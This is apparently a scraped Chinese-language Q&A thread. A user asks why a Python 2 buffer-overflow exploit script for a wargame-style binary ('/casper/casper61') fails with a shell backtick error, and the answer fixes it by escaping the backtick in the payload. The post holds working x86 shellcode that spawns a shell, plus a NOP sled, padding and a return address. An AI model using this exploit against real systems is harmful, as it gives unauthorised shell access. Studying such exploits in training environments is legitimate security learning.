Python脚本问题:";sh:1:语法错误:反引号替换中的EOF“;

Python脚本问题:";sh:1:语法错误:反引号替换中的EOF“;,python,bash,Python,Bash,当我尝试执行以下脚本时: #!/usr/bin/python import os level="/casper/casper61 " tmp_level="/tmp/r_734224hlb/casper61/casper61 " nop_sled= "\x90"*40 shellcode="\x31\xc0\x50\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" b

当我尝试执行以下脚本时:

#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "\x90"*40

shellcode="\x31\xc0\x50\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
buf_addr= "\x60\x98\x04\x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
我得到了这个错误:

sh:1:语法错误:反引号替换中的EOF

我有另一个类似的脚本,其中只有缓冲区地址不同,工作没有任何问题


有人能帮我吗?谢谢

生成的漏洞包含一个导致错误的
`
(反引号/反勾号),转义它应该可以修复它

'/casper/casper61 \xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x901\xc3\x80Ph//xhh/bin\xc2\x89\xc3\xa3P\xc2\x89\xc3\xa2S\xc2\x89\xc3\xa1\xc2\xb0\x0b\xc3\x8d\xc2\x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\\`<-HERE\xc2\x98\x04\x08'

看来你的谢邦错了。您可能想要
#/usr/bin/python
#/usr/bin/env-python
python2或pytho3?@shay这里的帖子是一个打字错误。我的错,顺便说一句,在我的代码中我正在使用#/usr/bin/python@PedroLobito我使用的是2.7.6版,它可以正常工作。谢谢我以为是这样,但我不确定。顺便说一下,我还有一个问题。正如我在开始时所说的,我有另一个脚本,除了缓冲区地址之外,它的代码基本相同。在这种情况下,利用漏洞怎么可能不会产生任何问题(确切地说是`字符')。再次感谢。不客气,很高兴它能起作用!关于你的评论,我不知道;-)
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\\`')